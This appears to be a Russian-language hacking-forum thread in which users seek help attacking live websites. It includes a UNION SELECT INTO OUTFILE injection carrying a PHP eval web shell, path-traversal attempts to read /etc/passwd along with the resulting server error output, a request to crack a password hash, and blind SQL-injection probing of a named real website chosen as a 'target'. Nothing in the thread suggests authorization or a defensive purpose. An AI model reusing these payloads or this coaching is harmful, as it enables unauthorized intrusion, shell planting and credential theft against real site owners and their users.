реакция на UNION вместе с SELECT. может пройти что-то одно из этого можно еще так: union%0Aselect или любым другим пробелом
Всем привет, нужна помощь: magic_quotes_gpc On On file priv Y если захексить кавычку, то она выводится на страницу, без ошибок(Into Outfile + двойной запрос не покатил) через двойной запрос отображается +and+1=0+union+select+'',777+from+mysql.user+into+outfile.., а между ковычек <?php eval($_GET['e']) ?> отображается к исходном коде, но в файл не записывается. Есть еще способы залить шелл? И если у кого есть большой словарь, расшифруйте: f9fce403c946f20f5b0634d7fffcbbcf з.ы полный путь естественно есть криво описал
Здраствуйте. Нашел ошибку file inclusion. Но когда питаюсь подключить сайти или вывести файл etc/passwd получаю Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6 Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6 Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6 подставляю %00 и получаю Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6 можно что нибудь сделать или уже ничего не вытащить?
это нужно подставить? когда подставляю получаю Warning: include(): Failed opening '../kinonetwork/incorrect_path/../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
Разложи карты ТАРО, они подскажут тебе верное направление или внимательней перечитай мануалы, может повезет, поймешь более правильный вектор, каждый случай индивидуальный и требует индивидуального рассмотрение на примере...
что за н... при SELECT любой столбец FROM users LIMIT 1,1 всё нормально ,кроме SELECT wallet_address FROM users LIMIT 1,1 Subquery returns more than 1 row
На подставление нулл-байта и изменении количества ../ поиск не ограничивается. Проанализируйте, есть ли есть waf на сайте, какие настройки и версия php используется( возможно ли использовании include в конструкции if, нормализация, усечение пути, стрим врапперы etc). По Вашим постам заметно, что используете самое малое количество методов, не пытаетесь разобраться во многом. Манов на форуме достаточно!
Приветствую. так получилось, что ранее не занимался никогда уязвимостями, хотя опыта в вебе разного много. Так вот, нубский вопрос. Выбрал цель http://www.colorfoto.de . Сканером нашел уязвимость здесь Code: http://www.colorfoto.de/abo/sonderhefte/?hnr=online.aboshop.colorfoto.stageteaser-canonEOS7D Собственно, при подставлении Code: ' -- в конец значния параметра hnr результат не меняется. значит не фильтруются эти символы, так? попробовал руками большинство методов из "SQL injection полный FAQ". Так же, результат вывода не меняется, значит команды принимаются, но отчет об ошибках отключен + при не верном результате все-равно возвращает исходную страницу, верно? Собтвенно вопрос, если это инъекция - как хоть как-то узнать о результатах выполнения команды? Сюда же - сайт как я понял на каком-то MVC фреймворке сделан. как определить каком именно ?
basket.js Это видимо просто скрипт корзины совпадающий с таким на других сайтах. получается тогда на безе CMS OXID e-shop согласно скрипту, но вероятность верного определения насколько велика?
